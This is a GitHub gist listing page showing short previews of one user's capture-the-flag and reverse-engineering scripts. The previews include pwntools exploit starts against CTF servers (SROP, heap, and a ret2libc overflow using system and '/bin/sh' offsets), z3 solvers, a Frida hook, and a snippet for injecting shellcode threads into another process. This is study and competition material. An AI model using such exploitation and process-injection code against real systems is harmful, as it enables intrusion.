sudhackar’s gists

sudhackar / solve.c

Created October 26, 2017 06:39

https://reverseengineering.stackexchange.com/questions/16624/solving-method-of-dll-crackme

	#include <Windows.h>

	typedef DWORD (__cdecl *_GetFlag)();
	_GetFlag GetFlag;
	HMODULE hDll = NULL;

	NTSTATUS main(int argc, char **argv) {
	hDll = LoadLibrary("my_head_flew_away_patched.dll");
	GetFlag = (_GetFlag)GetProcAddress(hDll, "GetFlag");
	GetFlag();

sudhackar / test-so.py

Created October 9, 2017 08:09

https://reverseengineering.stackexchange.com/questions/16509/identify-password-generation-algorithm

	from z3 import *
	import sys

	login = sys.argv[1]
	start_end_two = login[:2]+login[-2:]
	asciiSum = sum(map(ord,login))
	magicValueLogin = 0xfec0135a ^ int(start_end_two.encode('hex'), 16) ^ asciiSum

	password = BitVec("password",64)
	magicValuePass = BitVec("magicValuePass",64)

sudhackar / inject.py

Created September 29, 2017 17:00

Inject a thread running your shellcode into a process

	def InjectTo(proc_name):
	dwDesiredAccess = 0x1f0fff # PROCESS_ALL_ACCESS
	dwProcessId = GetPid(proc_name)

	if not dwProcessId:
	debug_print("\t[-] No such process")

	hProcess = kernel32.OpenProcess(dwDesiredAccess, False, dwProcessId)
	if hProcess == 0:
	debug_print("\t[-] Failed to get a handle to : %s" % (proc_name))

sudhackar / srop.py

Created September 27, 2017 14:48

[Backdoor CTF 2017] SROP

	from pwn import *
	context(arch='amd64', os='linux', log_level='info')

	'''
	Syscall# Param 1 Param 2 Param 3 Param 4 Param 5 Param 6
	rax rdi rsi rdx r10 r8 r9

	we make a write(STDOUT, *flag, len(flag))
	'''

sudhackar / crypto350.py

Created September 17, 2017 20:09

[CSAW CTF 2017] solution scripts for pwn and crypto

	from pwn import *
	context(log_level='info')
	s = remote('crypto.chal.csaw.io',1578)

	def send_blob(s, data):
	s.recvuntil(': ')
	s.sendline(data)
	print "sent", data
	return

sudhackar / frida-socket.js

Last active June 5, 2024 02:42

frida socket hook

	'use strict';

	var connect = new NativeFunction(
	Module.findExportByName(null, "connect"),
	'int',
	['int', 'pointer', 'int']
	);

	Interceptor.replace(connect, new NativeCallback(function (sockfd, addr, addrlen) {
	console.log(sockfd, addr, addrlen);

sudhackar / rhme3-whitebox.py

Last active November 14, 2018 19:59

RHME3 ctf Whitebox implemetation in pure python

dword_6661C0 = [1649885203,594050925,1581470779,-1391327847,-1611275700,-1912869808,-599971129,495688880,1480676927,-2013402532,-909651928,1320857042,210015150,-1192689802,-1425012835,-232312589,-1239741301,-1142292876,-1036574509,-1996951722,-198888713,-450216471,1280137767,8427430,-1995564639,-1761340491,731483796,1029862777,1380405299,2024325110,627735913,1179343915,-700764981,1404151492,1721939426,1016365966,-86589174,1705227488,-1290268787,-1495075486,92509344,-1091895950,-2046092117,695105889,1985694731,865175172,-549704763,966230152,543784559,-1108607888,1683309079,1220063190,1464095541,681086870,-1511787424,-2146885969,242443355,-153959166,58824356,-1861873231,-1661672626,-1762466494,41377875,-1595869338,1413829175,-1978722141,580815258,-433373973,159879336,311335354,125068117,1246713891,-1138947449,344759230,1078550063,2086488583,996177789,-607527372,2007874300,462003892,444557379,1153215454,377187403,765168784,-382846495,1621145574,-48089607,1203612380,2125118962,1103079640,1968852233,-751292467,564

sudhackar / rhme3-exp.py

Last active February 19, 2019 06:39

rhme3 CTF exploitation on heap

	from pwn import *
	context(arch='amd64', os='linux', log_level='info')

	system_main_arena_offset = 0x37f7e8
	got_strlen = 0x603040
	s = remote("pwn.rhme.riscure.com",1337)

	def recv_menu():
	s.recvuntil(": ")

sudhackar / binarypuzzle.py

Created June 23, 2017 18:40

A solver for http://binarypuzzle.com/ puzzles based on z3 ( https://github.com/Z3Prover/z3 )

	game = """
	.....1...1
	1......0..
	..0....0..
	.00...0..1
	1........1
	...0..1...
	0....1....
	.......0.0
	0........0

sudhackar / maze.py

Created April 27, 2017 03:52

bof on get_input()

	from pwn import *

	offset___libc_start_main = 0x0000000000020740
	offset_system = 0x0000000000045390
	offset_dup2 = 0x00000000000f6d90
	offset_read = 0x00000000000f6670
	offset_write = 0x00000000000f66d0
	offset_str_bin_sh = 0x18c177

	bss = 0x00000000000130b8

Sudhakar Verma sudhackar